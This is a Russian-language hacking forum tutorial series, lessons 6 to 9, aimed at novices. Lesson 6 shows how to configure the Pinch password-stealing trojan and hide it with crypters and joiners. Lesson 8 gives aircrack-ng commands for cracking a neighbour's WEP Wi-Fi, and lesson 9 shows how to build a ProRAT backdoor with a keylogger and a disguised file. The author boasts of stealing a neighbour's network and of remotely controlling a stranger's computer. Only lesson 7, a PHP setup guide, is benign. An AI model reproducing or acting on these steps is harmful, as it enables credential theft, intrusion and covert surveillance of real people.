"Создать Текстовый документ"---(открываем и прописываем в нём команды....допустим regedit.exe)---"Файл сохранить как"---( там где тип, в место "Текстовый документ" ставим "Все" и в имени файла дописываем расширение "Текстовый документ.cmd"--сохранить ) // и мы получаем полноценный файл))))

Можно пропустить.
_______________________________________________________
Огромное спасибо за такие приятные отзывы!!!
Очень сильно извиняюсь ,что так долго не выходил на связь ни с кем))) (поэтому делаем выводы...аська рабочая) =)
Я наконец сдал экономический английский!!!!!!!!!!!!!!! и теперь могу с офигенно хорошими чувствами начать писать следующий урок!
Раньше я старался писать всё только вводное во взлом.
Сегодня мы с вами научимся реально взламывать. 
_______________________________________________________

Урок 6.

Возрождение динозавров!

Все файлы которые будут использоваться в статье находятся
здесь :  http://rapidshare.com/files/148091408/_ … _.rar.html

И так....
Сейчас предполагается то , что вы не знаете ни одного языка программирования......
Но это не беда! Мы всегда можем воспользоваться чужим творением!
И сегодня я вас познакомлю с Hack-Tools`ами
Мы сейчас на стадии Кидеров (от англ. KID - ребёнок) потому , что мы с вами к сожалению не знаем программирования и не можем написать свои программы.
Но как бы это не звучало ....ребёнок.....им тоже надо уметь быть...иначе бы не создавалось куча тем ....как использовать Pinch....
Собственно с него мы и начнём.

Pinch
Одна из самых старых Хак тулз.
Что он делает....Он просто напросто выдерает все сохранённые пароли на компьютере...при этом прихватывая с собой информацию о нём.
Сегодня надо развеять миф насчёт того что Pinch(mail) уже не в игре.
Еще как в игре!
Мало того я его  только и юзаю....вместо того чтобы парится насчёт хостинга....и того как к вам прийдут отчёты или нет.....
Но так как прикрыли на mail.ru эту фитчу....все впали в лихорадку и стали юзать Гейт для получения отчётов.
Ну а мы с вами пойдём по менее сложному пути.
и так вам понадобится
1)Pinch3 (mail)
2)Нет не прямые руки....)))тут они не нужны))))(Интернет) =)//вообще отвыкайте от прямых рук ....представьте если бы у всех были прямые руки...как бы мы ели c ложки?
3)Parser2
4)staff (и всякая мелочь)

Поехали делать наш мэйловский пинч!!!)))

1) Мы должны зарегистрироваться на mail.tut.by  (два мыла)// допустим qwerty1(sender) и qwerty2(receiver)
2)Переходим к настройкам пинча...
Открываем Pinch3 (mail) и если приглядется то там данные будут разделены на Sender(отправитель) и Receiver(получатель)
Заполняем Sender
E-mail --- Указываем нашу почту.....qwerty1@mail.tut.by
SMTP server (надеюсь вы знаете что сервер это тот кто предоставляет вам услуги) в данный момент сервер это mail.tut.by поэтому мы указываем так ----smtp.mail.tut.by
User --- даёте пользователя который будет отправлять отчёты qwerty1 //обратите внимание на поле E-mail =))делаем вывод кого писать должны
Password --- пaроль от пользователя qwerty

Далее переходим к полю получатель....тот кто будет получать отчёты от Sender`a
Е-mail ---- вводим аккаунт того кто будет получать ....в нашем случае это qwerty2@mail.tut.by

Subject это тема письма....которая будет указываться  при получении отчёта..... я лично ставлю Project
File name это имя файла ....которое будет прикреплено к письму...(в дальнейшем будет называться отчёт) я его называю Project.bin

Options --- от туда убираем все галки

Далее жмём Build и получаем полноценный троян))))
Он у вас сохранится в той же дерриктории где и Билдер.....с именем Pinch3.exe

Для того чтобы (прочитать пароли которые заключены в Project.bin) нам нужна другая программа.....
Её зовут Parser
Эта программа дешифрует этот файл и перед вами открывается взор всего отчёта.
Для того чтобы её установить нужно.....
1)Создать в диске C:\ папку Reports
2)Копировать Parser2.exe в эту папку.
3)Открыть Parser2 зайти во вкладку  Parser--Settings--DB Profiles--(и там вы увидите  Default (нажмите на это поле) появится Дефалтные настройки , тобишь стандартные. Жмём ОК и у нас появляются дополнительные папки....)))не пугайтесь так и надо....

И теперь наконец....как же из файла *.bin получить информацию.....
Берём сохраняем этот файл себе на Жёсткий диск......и перетаскиваем в папку Reports после чего открываем Parser и видим что у нас появилось письмо......Щёлкаем на него два раза....(ну или один...кому как нравится..) и получаем полноценный графический отчёт.....(в виде древа)
System info \ Disks итд......щёлкаем по этим папкам и вкладкам .....и получаем с правой стороны поля информаци...)))(ну я думаю вы разберётесь.

Я бы мог на этом и закончить описание великолепного троя ...но я не такой как все))))
Если вы не заметили ....то я назвал тему "Возрождение динозавров" не просто так.....
ибо моей главной целью в этом уроке познакомить вас с Крипторами и Джойнерами

Криптор - программа которая шифрует код другой программы до неузноваемости....но при этом зашифрованная программа остаётся работаспособной.(используется для того чтобы антивирусы не могли понять что это вирус)
Джойнер - программа которая склеивает две программы во едино при этом есть возможность менять иконку двух склеенных программ.(используется для дезариентирования пользователя которому вплавляют троян / вирус)
/*-ОЙ посмотри какая суперская игра!
-(открывает файл ) И открывается игра....О да и в правду супперская игра!!!!
а в это время отчёт уже прилетел к нам в почту)))) */

Начну я всётаки с Джойнеров....
И я вас познакомлю с "FreeJoiner Stub v1.7 (C)"
Это офигенноый джойнер....который можно использовать бесконечно....если его вид склеивания "пропалят" антивирусы....то всегда можно ПРОСТОМУ ПОЛЬЗОВАТЕЛЮ поменять его в ручну....и как им пользоваться я покажу вам в видео....которое я сделал специально для вас.
http://rapidshare.com/files/148079174/Manual.rar.html // извините за то что большой файл по размеру получился....1695 КВ...

Теперь перейдём к крипторам
Их бывает очень много....
Но Крипторы бывают 2х типов.....
1)Полиморфные - те крипторы которые используют особый вид шифрования(агрессивный) ....который очень мощный....но при этом он может "зашифровать" так...что файл даже не откроится... и этот вид крипторов не дружит с Джойнерами и с другими видами Крипторов...в отличи от простых Крипторов он очень сильно изменяет сигнатуру кода.
2)Простые Крипторы....Их примечательность в том что они дружелюбны...в отличии от полиморфных они дружат и с джойнерами и со своими собратьями)))
Их можно использовать в связке.....Один простой криптор + Другой простой криптор......(Один допустим палится....а если заюзаешь второй в месте с первым то трой уже палиться не будет....)

Крипторы сами по себе очень простые в использовании....они просят максимум это путь к файлу который нужно зашифровать.....
И иногда можно ставить разные галочки)))(которые меняют вид шифрования в ту сторону которая выгодна вам.)

Так получилось что у меня под рукой нету ниодного нормального криптора....но вы всегда можете найти их в Гугле....
Главное понять что функция крипторов для нас ....заключается в том чтобы антивирусы не смогли распознать Троян.
А функция джойнеров в том чтобы пользователь не заподозрил обманку.

Используя эти две вещи вы сможете добиться максимальной пробиваемости ваших творений.

_______________________________________________________________________________________________
Так же хочу зарание предупредить всех....
ВСЕ паблик ХАК ТУЛЗЫ ПАЛЯТСЯ АНТИВИРУСАМИ(тоесть во время того как включен антивирус ими нельзя пользоваться)
поэтому отключайте антивирусы когда будете ознакамливаться с этим уроком.....если вы мне не доверяете тогда оставайтесь в неведеньи дальше....
А я вас уверяю что я в инструменты малвари не пихал.
_______________________________________________________________________________________________

Надеюсь вы что то новое узнали из этого урока.
И вопросы которые вы задавали раньше будут сняты.
Так-с вижу куча вопросов......
Всё можно решить.
26Rus извини что  так получилось с виндой....
Но я предполагал что вы читали мои ранние статьи....про реестр.
__________________________________
Что касается того что нужно удалить
В поиске реестра вбиваете "Parser2" и удалаяете всё что с ним связанно...но не как не  "Parse" а "Parser" хотябы...

Потом кто то написал про stub.."я повторил за тобой но всёравно палится".....
Ненадо повторять один в один.....я же скинул файл readme.txt(откуда вы копировали) там всё по русски написанно....там было написанно ,что эти команды вы вставляете произвльно.....после ".code" что я на видео и сделал.....
До того времени когда перестанит палиться....

Воот. А глобальные проблеммы с Парсером решаемы....(п.с не думайте что я не прошёл через это....у меня такие же проблеммы были...я их решил через реестр //то что напишу снизу.)
1)НЕ ОТКРЫВАЙТЕ ПАРСЕР ДО ТОГО КАК НЕ ПЕРЕНЕСЁТЕ ЕГО В C:\Reports (эту папку вы должны создать сами)

2)Если вы всётаки открыли Parser2 или не поставили ДЕФАЛТНЫХ НАСТРОЕК ПРИ ПЕРВОМ ЖЕ ОТКРЫТИИ ПАРСЕРА то...
2.1)Удаляем всё содержимое папки Reports (но не саму папку)
2.2)заходим в реестр жмём ctrl+f (открывается меню поиска) там вбиваем Parser2  и удаляем всё что связанно с ним.(в плодь до полной ветки)//ТОЛЬКО ТО ЧТО СВЯЗАННО С НИМ!!!!(если вы всётаки не разбераетесь в реестре....то пожалуйста не делайте этого ибо мне и так очень жаль 26Rus не хочу чтобы история повторилась с кем то другим....)
2.3)После того как вы всё почистили
Скопируйте Parser.exe в папку Reports после чего откройте Parser2 и БЕЗ ВЫХОДА ИЗ ПРОГРАММЫ нажмите : Parser---setings--DBProfiles---Default--ОК
2.4)Закрываем Парсер. Переносим отчёт который мы получили в папку Reports ..... Открываем Парсер и получаем письмо.
__________________________________________

Да и кстати ....отчёты никогда не приходят "битые"....они либо приходят либо нет.//значит проблемма в Парсере.
Битых отчётов не существует.(в нашем случае)
Можно пропустить.
_______________________________________________________________________
Я долго мыслил о чём же написать в следующем уроке .....и решил последовать
своим прошлым убеждениям о том что хакер должен быть независимый.(см урок 1)
И в этом уроке я решил написать то с чего я начал свой путь....после того как побаловался разными программами вроде Brute Pinch и Spamer...
Потихоньку мне это стало надоедать....и захотелось уже приступить к взлому сайтов.
Но для того чтобы понять как устроен сайт мне понадобилось осуществить пару манёвров ....которые я вам расскажу.....
_______________________________________________________________________
Урок 7.

С чего начать!

Первым делом нужно уяснить , что хакер не хакер....если он не знает хотябы 2х языков программирования.
Нужно знать , что есть компилируемые и интерпретируемые языки программирования.
К компилируемым относятся (C++ ,Delphi, C# итд.)
К интерпретируемым (PHP,Perl,Python итд.)

Их главное различие между собой заключается в том что компилируемые языки создают программу из исходников(кода) при помощи другой программы - компилятора.
Компилятор проверяет код на ошибки а потом из него делает программу.//процесс называется компилированием.

А интерпретируемые языки не требуют такого подхода. Зато для того чтобы написанный код работал нужно иметь специальную программу интерпретатор.

Таким образом Компилируемые языки преобразуют написанный код в машинный тем самым получают основной файл(программу)//допустим prg.exe
А интерпретатор не преобразует код. Но для того чтобы он исполнялся нужно иметь (этого языка)программу интерпретатор.//prg.php (и для этого нужна программа чтобы открыть этот файл.)

Так вот...к чему я это всё.....

Вы должны для себя выбрать путь....
Каким хакером вы хотите стать.....WEB или Crack`er
1)Если хотите ломать сайты то вам надо для начала изучать интерпретируемые языки....я начал с PHP и javasсriрt...
2)А если крякером(ломать программы).....то надо изучить Assembler и C++ естественно C++ в начале...для того чтобы понять структуру.....

И тут я бы вам посоветовал выбрать первый вариант ибо он легче.....и на нём можно заработать больше)))хотя если вы знаете хорошо второй способ на нём можно тоже очень хорошо заработать)))

Но расскажу я вам про прервый ибо я выбрал его.

И так....первым делом вам надо понять ,что сервер...это такой же компьютер с Виндой(или с любой другой OС) который предоставляет вам доступ к некоторым файлам....
В часности WEB ..... допустим google.com ихний сервер держит в себе такие же WEB странички как и все.....у него есть index.php или index.html итд.

Я надеюсь что вы выполнили моё прошлое домашнее задание и выучили html !
Без него вы никуда не денетесь....это костяк.....
Для изучения мы выберем языки PHP и SQL
Так как PHP очень распрастронён и SQL так как в дальнейшем мы будем ломать БД(базы данных) используя запросы....//этот вид атаки называется SQL injection

И начнём мы с того что сделаем нашу машину сервером!!!(тоесть установим Apach+PHP+SQL)
Это понадобится нам для обучения...
Вот ссылка на файл который нужно установить. ТУТ 
Этот установочный файл не заставит вас гемороиться насчёт настройки конфига PHP+MySQL....(на данном этапе обучения я считаю вам это никак не пригодится)
Когда будете настраивать там где будет написанно localhost не меняйте ничего...(чтобы в дальнейшем я мог объяснять и вы не сбились...а все остальные поля заполняйте как хотите.)

И так...надеюсь с установкой всё прошло чики пуки)))
Теперь давайте затестим....всё ли так гладко как нам кажется....
Открываем любой браузер....(браузер - программа в которой вы просматриваете WEB странички) и набераете в URL (адрессная строка) localhost
И если установка прошла на ура...то у вас появится страничка с заголовком "The AppServ Open Project - 2.4.0 for Windows "

После того как вы увидели эту страничку...можно преступать к обучению.

+3

3

Первые понятия WEB страничек
Переходим к созданию первой своей странички....написанной на PHP!
И так...смотря куда вы установили Апач в такой директории и ищите....если вы устанавливали по дефолту(стандарту) то переходим C:\AppServ\www
и в директории создаём папку с именем  google //заметьте что папка названна маленькими буквами.(регистр важен)
Заходим в неё ....и создаём файл index.php //регистр важен
Теперь редактируем index.php //пишем в вайле
_____________________

<?php
printf("My first Google!")
?>

_____________________

Опять открываем Браузер и вводим в URL localhost/google
и если вы всё правильно сделали у вас должна открыться страничка а там написанно "My first Google!"

Надеюсь вы поняли структуру вайловой системы...что index.php или index.html это стартовая страничка.....и она(этот файл) открывается первой в папке если она указанна.
И то что WWW это стартовая дерриктория ....откуда начинается localhost...если вы внимательны ....то заметили что index.php в этой дерриктории тоже присутствует..... поэтому когда вы набрали localhost у вас открылась страничка...а не пустота)))

ИТОГ:
Мы с вами поставили свой собвстенный сервер благодоря которому вы можете продолжать обучаться....и не спрашивать на форумах как открыть love.php =))
Так же я надеюсь вы разъяснили для себя какого вида языки программирования бывают....и выбрали для себя что вам нужно.

И самое главное....не повторяйте моей ошибки....
параллельно не изучайте 2 языка программирования....у вас в голове будет такая каша....вы запутаетесь во всём что можно.....
А моя беда....я начал изучать C++ и PHP одновременно....и те кто знают эти языки....поймут меня)))ибо они оба до боли похожи...но различия всётаки имеются....//вывод...путанница и в том и в том языке)))естественно я потом это исправил....но это заняло время

Вот вам учебник по PHP http://www.softtime.ru/bookphp/gl1_1.php //это для тех у кого лимитный или медленный интернет....
А для тех у кого безлимитный и быстрый интернет....я выкладываю ВИДЕО УРОКИ по PHP & MYSQL
Rapidshare
http://rapidshare.com/files/150332728/1.part01.rar.html
http://rapidshare.com/files/150335933/1.part02.rar.html
http://rapidshare.com/files/150338304/1.part03.rar.html
http://rapidshare.com/files/150340224/1.part04.rar.html
http://rapidshare.com/files/150342354/1.part05.rar.html
http://rapidshare.com/files/150343811/1.part06.rar.html
http://rapidshare.com/files/150345879/1.part07.rar.html
http://rapidshare.com/files/150349053/1.part08.rar.html
http://rapidshare.com/files/150351471/1.part09.rar.html
http://rapidshare.com/files/150353524/1.part10.rar.html
http://rapidshare.com/files/150357909/1.part11.rar.html
http://rapidshare.com/files/150360297/1.part12.rar.html
http://rapidshare.com/files/150361864/1.part13.rar.html
http://rapidshare.com/files/150365282/1.part14.rar.html
http://rapidshare.com/files/150366875/1.part15.rar.html
http://rapidshare.com/files/150369218/1.part16.rar.html
http://rapidshare.com/files/150371856/1.part17.rar.html
http://rapidshare.com/files/150373276/1.part18.rar.html
http://rapidshare.com/files/150375542/1.part19.rar.html
http://rapidshare.com/files/150377380/1.part20.rar.html

Можно пропустьить.
_____________________________________________________________________________________
Сегодняшний урок будет посвещён взлому WiFi Сетей...вы бы знали как приятно когда ты взломал очередную сетку...
Но я собственно и пишу эту статью чтобы вы узнали каково это!))))
Сегодня (позаимствовал сетку) в нашем районе=))только ради этого урока....//превыкайте слово позаимствовал это взломал.(чтобы не палиться)))
Но самое приятное это был не халявный интернет.....а Удалённый доступ!!!который я совсем не ожидал)))//пишу под эмоциями так что извиняюсь за смайлы))).
_____________________________________________________________________________________

Урок 8.

Взлом Wifi
Вообще взлом Wifi Сетей называется Вардрайвинг (wardraiving)
//для того чтобы у вас всё получилось в этом уроке вам нужен либо ноутбук(с потдержкой Wifi) либо комп с сетевой картой.(короче тоже потдержка Wifi)

И так первое с чего надо начать это с выбора инструмента взлома.....
Сегодня я вас познакомлю с самым известным хакерским "инструментом" //вернее сказать Операционной Системой(ОС)

BackTrack 3

Эта операционная система созданная для анализа сетей....и "тестирования безопасности"//но мы то теперь знаем для чего она =)

Но не расстраивайтесь....вам не надо будет удалять вашу любимую Windows для того чтобы пользоваться этим уроком.

BackTrack 3 бутабл операционная система(тоесть её можно загружать из других носителей  таких как USB (флешка) CD (диск) или WMware (виртуальная машина)
Я вам расскажу как можно поставить эту операционную систему на USB и на CD .//для USB понадобится 784 MB а для CD 695 MB свободного места.

Разделим на несколько пунктов установку.

1)Скачиваем дистрибутив (ОС) c официального сайта http://www.remote-exploit.org/backtrack_download.html
//перед тем как качать обратите внимание там несколько дестрибутивов.....выберите тот который вам нужен.....тобишь USB или CDROM .

2)После того как вы скачали...дистрибутив распакуйте его в любое место на компе и у вас появятся две папки.... boot и BT3

3)Открываете папку BT3 и запускаете файл make_iso после чего переходите в папку boot и открываете bootinst (при этом и в том и в том файле вас просят несколько раз нажать Enter сделайте это...)

4)Так наш дистрибутив готов....теперь если вы хотите пользоваться USB версией ....то просто перекиньте эти две папки в корневую деррикторию(корнивой деррикторией называется первоначальное место сохранения....тоесть если ваш USB находится F:\ то корнивая дерриктория для него и будет F:\  )  и проделайте пункт 3 еще раз....ВАЖНОчто бы флешка была пустой (на момент залития папок)

//ТАК ЖЕ  ЧАСТАЯ ОШИБКА ЭТО ТО ,ЧТО ВЫ КОПИРУЕТЕ НА НОСИТЕЛИ НЕ 2 ПАПКИ А ОДНУ ...А В НЕЙ ЭТИ ДВЕ....ЭТО НЕ ПРАВЕЛЬНО.
НУЖНО ЧТОБЫ У ВАС БЫЛО 2 ПАПКИ А НЕ ОДНА ПАПКА А В НЕЙ ЭТИ ДВЕ.

А что касается CD мы вставляем пустой диск....там где у вас находится пустой диск....(у меня это диск D:\) перебрасываем эти две папки в эту деррикторию и проделываем пункт 3 еще раз.
И только после этого прожигаем диск....

Вот что должно у нас получиться.... http://img241.imageshack.us/my.php?imag … 834pf7.jpg

И так.....с установкой нашей ОС мы закончили...но теперь её надо как то загрузить...!!!!

И это мы делаем через BIOS!
это для тех кто не знаком.... http://ru.wikipedia.org/wiki/BIOS
//Биос загружается при загрузке компьютера...тоесть вы перезагружаете компьютер...и когда он только началзагружается..(не появилось окошко загрузки Windows) вы жмёте определённую клавишу несколько раз за секунду....и у вас появляется BIOS а не загрузка Винды....)
Но тут возникает маленькая проблеммка....у всех разные BIOS`Ы
И соответственно разные комбинации клавиш...для того чтобы загрузить его....

У меня лично он загружается на клавишу F12 но бывают разные случаи.....поэтому почитайте вот эту ссылкуhttp://itc.ua/node/32864 (Загрузка BIOS) там разные клавиши приведены.

После того как вы зашли в BIOS (надеюсь у вас это таки получилось) вам надо найти Всё что связанно с вкладкой BOOT ( загрузка) и поменять её параметр на тот который вам нужен....тоесть если у вас USB на USB если CD то на CD ....(а по дефалту она стоит на hard Disc - жосткий диск)
//USB в некоторых Биосах принимается как Floppy Disc
А в некоторых BIOS' ах приоритет загрузки надо поменять...тоесть с какого устройства надо пробовать грузиться в первую очередь а с какого во вторую....
НО ВСЁ ЭТО СВЯЗАННО СО ВКЛАДКОЙ ИЛИ ПОЛЕМ BOOT  //так что ищите и разбирайтесь...вам это понадобится....во всяком случае можете у друга попросить чтобы он вам помог загрузиться с определённого носителя с помощью вашего BIOS`а

Так же при загрузке очень часто можно увидеть сообщение о возможности загрузиться с Биоса и какую клавишу надо нажать...так что читайте что вам пишут когда вы только включаете компьютер.

Когда мы наконец таки правильно настроили биос и загрузились с нашего носителя.....( нашу ОС )

То сначало вы увидите как BackTrack просит вас выбрать вашу видео карту.....обычно для всех ноутов это первая строчка....но для моего это оказалась третяя (Vesa) выберите ту видеокарту которая у вас...и если вы выбрали её правильно то вы увидите как BackTrack грузится.....и после чего вы попадаете в графическое меню(рабочий стол) как в винде....

Переходим к взлому
Всё мы вошли... теперь нам надо узнать какой у нас интерфейс....у нашей сетевой карты....это можно узнать через консоль //см рисунок как войти в консоль.
Набрав команду  airmon-ng
Вот как это выглядит http://img184.imageshack.us/my.php?imag … ot1il0.png

Когда мы узнали какой у нашей сетевой карты интерфейс(у каждого он может быть разный ...подставляйте свой) мы запускаем его в режим мониторинга это нужно для того чтобы сетевая карта могла быстрее собирать пакеты передаваемые сетью.
Делается это командой airmon-ng start eth0 (cм рисунок выше)

Всё сетевую карту мы подготовили.
Теперь нам надо узнать что вообще за сети сейчас присутствуют и какие виды защиты они используют.
для этого мы в той же консоли прописываем команду airodump-ng eth0 (жмём и появляются строки с сетями...их идентификаторами каналами...итд.) после того как вы видите что больше уже ничего не появится....вы жмёте Ctrl + X или Сtrl +Z  попробуйте эти две комбинации я просто точно не помню....но скорее всего первая....это нужно для того чтобы остановить анализ сетевого пространства и уже непосредственно перейти к нападению.

И так мы собрали информацию....
вот что она означает...... http://img142.imageshack.us/my.php?imag … ot5gn6.png

Мы будем рассматривать взлом Wifi  с защитой WEP так как она сама уязвимая....и при этом остаётся популярной.....есть еще несколько видов такие как WPA\WPA2 про них вы можете где угодно прочитать....а я вам закладываю основу....

После того как мы узнали основную информацию о сети....а это
1)Идентификатор сети
2)Канал на котором расположена сеть
3)Вид шифрования (WEP)

Можно приступать к воровству....
Нам нужно задать такой запрос в консоле
airodump-ng -c (Канал сети которую ломаем) --bssid (идентификатор сети которую ломаем) --ivs -w capturefile eth0

--ivs это значение показывает что не все пакеты нужно собирать ....а только с определённой информацией хранящей в себе пароль.
-w (имя файла) это значение для того чтобы куда то сохранить все эти пакеты....
eth0 интерфейс нашей карточки...

Вот как выглядит запрос в моей ситуации... http://img142.imageshack.us/my.php?imag … ot5gn6.png //сопаставьте его со своим и всё поймёте.....
Жмём Энтр и у вас получается , что из всей горы Wifi которых вы видели....остаётся только эта точка....и пакеты (#Data) должны собираться быстрее...
#Data хранят в себе "кусочки пароля" и именно их нам надо собирать.....скорость их добычи зависит от того подключён ли к этой сети другой пользователь и насколько активно он использует его....чем активнее он использует инет тем быстрее мы его ломанём....
есть два вида ключа 64 битный и 128 битный....для 64 бита потребуется от 50 000 до 200 000 векторов инициализации, а для успешного взлома 128-битного WEP - от 200 000 до 700 000!
эти цыфры были приведины http://www.thg.ru/network/20050806/onepage.html этим ресурсом....
Хотя на практике мне для взлома 64 битного хватало 20000 пакетов...(векторов инициализации) а для 128 битного 60000....

Так вот...как узнать подключён ли к сети пользователь....
вот смотрите.... http://img147.imageshack.us/my.php?imag … ot4xd2.png

Далее мы хотим повысить фактор взлома...(ускорить его)//это можно устроить если  к точке подключён другой пользователь....

Открываем еще один терминал и прописываем команду
aireplay-ng -a (идентификатор сети) -c (идентификатор пользователя) --deauth 10 eth0
еще разок посмотрите пример... http://img147.imageshack.us/my.php?imag … ot4xd2.png
сделайте эту команду раза 3 .....она поможет для получения #Data.

Через некоторое время мы собрали достаточное количество пакетов(на наш взгляд)....(если вы не уверены что это количество достаточно вы можете просто не закрывать терминал там где вы собираете эти пакеты...и проверить....взломали ли вы уже сеть.....)
А делается это так....
Открываем новый терминал и вбиваем туда команду
aircrack-ng (и перетаскиваем с корневой папки /root файл который был создан в моём случае это capturefile.ivs) и вставляем его в терминал.....
у вас получится что то вроде этого
aircrack-ng '/root/capturefile.ivs' 
А вообще смотрите рисунок....  http://img517.imageshack.us/my.php?imag … ot6jf9.png
после чего жмём энтр....и ждём перебора.....
Если вы достаточно насобирали себе пакетов...то тогда вы получите вот такой результат
http://img147.imageshack.us/my.php?imag … ot7at6.png //И это будет ключь от вашей Wifi точки....
//Частая ошибка ключ пишется без двоеточия...
А если нет то вам выдодут ошибку о том что мало пакетов...

Вот собственно и всё со взломом Wifi))

Но я до расскажу историю которая приключилась со мной....
после того как я своровал вайфай ключь ...я просканировал диапозон IP адресов этой сети....от 192.168.1.1 до 192.168.1.255

И обнаружил еще несколько компов в сети....
Ради прикола решил просканировать на открытые порты один комп(при помощи nmap)....и оказалось что у него открыт порт от программы Radmin(программа для удалённого доступа...) я скачал клиента и полностью рутил его компом...как весело было наблюдать за его рабочим столом как он гамал в Сталкер)))) вот скриншот как я это сделал.
http://img262.imageshack.us/my.php?imag … 881wa5.png

________________________________________________________
Подведём итоги.
1) Мы с вами познакомились с BIOS`om и его возможностью загружаться с разных дисковых накопителей.
2) Мы  поняли что бывают разные виды защит Wifi и то как они уязвимы.
3) Я думаю вы теперь поняли что Radminom лучше не пользоваться)))) особенно если часто подключаешся к незнакомым сетям.
4)Познакомились с очень НУЖНОЙ для нашего дела ОС (BackTrack) кстати она основанна на UNIX поэтому вы параллельно можете понять файловую систему UNIX .

И наконец вы хоть и немного но поработали с терминалом.
__________________________________________________________
Я заранее извиняюсь что урок получился сложным......как мог старался упростить... давать меньше теории которую вы можете при необходимости найти...а показывал одну практику.
Можно пропустить.
_______________________________________________________
В этом уроке я рассмотрю очень известную хакерскую тулзу...
А уже в следующем уроке мы непосредственно перейдём ко
взлому сайтов =) так что вам осталось последний урок потерпеть)))
И я надеюсь что вы уже все выучили html.
_______________________________________________________

Урок 9.

ProRAT

ПроРАТ это очень известная троянская программа которая использует такую систему "атаки" как backdoor (Бэкдор) - что это такое можно узнать от сюда http://ru.wikipedia.org/wiki/Backdoor

Я специально выложил её для вас сюда
http://ВНИМАНИЕ! Тут должна была быть ссылка на depositfiles.com, скорее всего это вирус или троян!/files/8679846

А теперь давайте рассмотрим эту программу.

Распаковываем архив в любое место....и открываем программу ProRat

И первым же делом хочу сказать минус этой программы.....она работает только в локальной сети....и тех у когостатичесий IP(тоесть никогда не изменяется) (Естественно со стороны сервера)
//надеюсь что вы понимаете что локальная сеть это не только компы подсоединённые друг к другу проводами)))
Но это не обломно ...ибо её можно применить на работе....в школе....в инсте....тут зависит только от вашего воображения...

Первым делом нам надо сделать сам троян (Сервер) кто забыл ....сервер это компьютер предоставляющий свои услуги.....=)
в нашем случае это компьютер жертвы......(тоесть файл который будет открывать атакуемый)

и чтобы сделать этот файл....мы должны перейти во вкладку Create --- Create ProRAT Server 
И после этой процедуры первая вкладка будет
Notifications (Оповещения) - эта вкладка отвечает за то чтобы настроить оповецение о том что этот файл открыли....//тут вы можете настроить оповещение по ICQ Mail CGI логу))) но эта вкладка не интересна....ибо почти во всех случаях оповещение либо глючит либо вообще не работает.....Но кому интересно можете попробовать.

General Settings  вот эта вкладка очень важная....сдесь мы должны  установить парольна Сервер и ваше имя для сервера Victim Name
Огромная просьба ...обратите внимание на пароль....ибо если вы его оставите по дефалту (123456) то тогда любой грамотный хакер ....да и безграмотный может просканировать деапозон IP на открытые порты.... найдёт 5110 порт...и поймёт что это ProRAT и то что к нему можно подключиться.....(а темболее это губительно если вы на себе тэстируете программу)
А что касается имени...оно особо не понадобится.....оно только понадобится для переписки (про которую я напишу позднее) а пока ставьте свой ник.
Порт оставьте 5110 ....
Ну и последнее что пожалуй нас заинтересует...это Give a fake error massage  (Выдать ложную ошибку) тоесть после открытия троя ...вылетит ошибка...текст которой можете написать вы....нажав на Configure и редактируете текст ошибки.
// и вот еще что....подумайте перед тем как поставить эту галочку...а надо ли вам она?(отвлекать пользователя разными ошибками =) )

Bind with File
//вот собственно почему я и писал....а надо ли вам это....если в следующей вкладке можно скрепить файл с файлом.....тем самым не привлекать внимания пользователя ошибками....а привлечь внимание программой.....вордовским файлом.....или еще чем...

Bind Server with a file(Скрепить файл сервера с другим файлом)если хотите воспользоваться этой функцией ставим галку...и выбираем файл при помощи Select file.

Select Server Extension(выбор вида файла на выходе)
Тоесть какого расширения вы хотите файл...досовский фай .com или программу .exe или батовский файл .bat...но учтите что только под SCR и EXE потдерживаются иконки....(вставление ложных иконок)

Server Icon
Тут мы собственнои и выбираем иконку....для нашего файла

После чего мы успешно закончили нашу установку....и жмём Create Server

У нас получился новый файл в папке под имение Server .....
______________________________________________________________________________
Вот собственно мы и сделали наш вирус)))

Теперь его функционал....
После того как вы запустили его на машине другово пользователя....находящегося в локальной сети или имеющий статический IP
мы можем выполнить вот какие действия (уже со совей машины...)//Но перед этим нам стоит подключиться к этой машине....)))
и делаем мы это так.... в поле IP пишем айпи машыны жертвы....
вот как можно узнать IP жертвы....
1)Сделать финт ушами....тоесть склеить ПроРАТ вместе с Пинчом.....(а как вы помните он отображает информацию о подключении)
2)Тупо посмотреть IP с его машыты.....набрав в Выполнить ipconfig /all ( а там будет поле IP-адрес)
3)Воспользоваться анализатором сети.....Advanced LAN Scanner http://www.radmin.ru/products/utilities/lanscanner.php
//но чаще всего такой возможности не выпадает ибо его надо установить...а мы представляем что мы ограниченны в рамка....так что можно воспользоваться еще одним финтом....
4)Узнать IP жэртвы можно попросив её перейти на http://old.antichat.ru/cgi-bin/s.jpg 
а самому ждать тут http://old.antichat.ru/sniff/log.php ....и после того как вы почуствовали что он уже мог зайти.....обновляйте...и первая строка будет примерно такой...

[Sun Oct 12 01:16:58 2008] IP=78.116.93.120 SITE=
    REFERER=
    QUERY=
    AGENT=Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3
Где IP это IP   жертвы...

5)Или тупо узнать через виндовское приложение......(подключения)

И так мы узнали IP теперь вставляем его к нам в ProRATв поле IP ,Порт если вы не изменяли...то оставляем такой же ..и жмём Connect
Если у вас всё получилось то у вас запросят пароль который мы указывали...для подключения к серверу.//набираем его и ОК

Всё мы приконнектились....
Теперь я рассмотрю самые важные для нас функции этой программы.

1) это возможность управлять файлами...(просматривать,удалять , скачивать,закачивать)
И чтобы это сделать мы переходим во вкалдку File Manager --- Refresh
и вот перед нами открылась файловая система другово компьютера....
с такими вкладками как Upload (загрузить на сервак) Download(Скачать с сервакак) Delet (удалить) Run (выполнить) ....создать деррикторию итд...мы можем всё! А то что мы можем всё я вам докажу на личном примере....но об этом чуть ниже....

2)Следующая вкладка на основном меню которая важна для нас...это Registry(Реестр) при помощи этой вкладки мы можем изменять реестр .....лазяя по нему в релальном времени))))Для этого нужно перейти
Registry --- и в поле Root key выбирать в каие ключи ты хочешь редактировать....

3)KeyLogger (название говорит само за себя....
Это кийлогер...для тех кто забыл ...это (шпион клавы) тоесть считывает все нажатые на компе клавишы и передаёт их нам....в виде лога
для того чтобы воспользоваться этой функцией жмём...
Keylogger---Read Log //и периодически нажимайте Read Log так как он сам не обнавляет нажатые клавиши....а если вы так нажмёте то он обновит....

4)Services Manager
Для нас это тоже очнеь важная фишка....так как тут не только можно наблюдать за всеми процессами которые выполняются...но и откючать их.
Services Manager --- (выбераете процесс) и выбераете действие Старт\Стом\Удалить\Авто запуск..

5)Screen Shot делаем скрины удалённого компа....
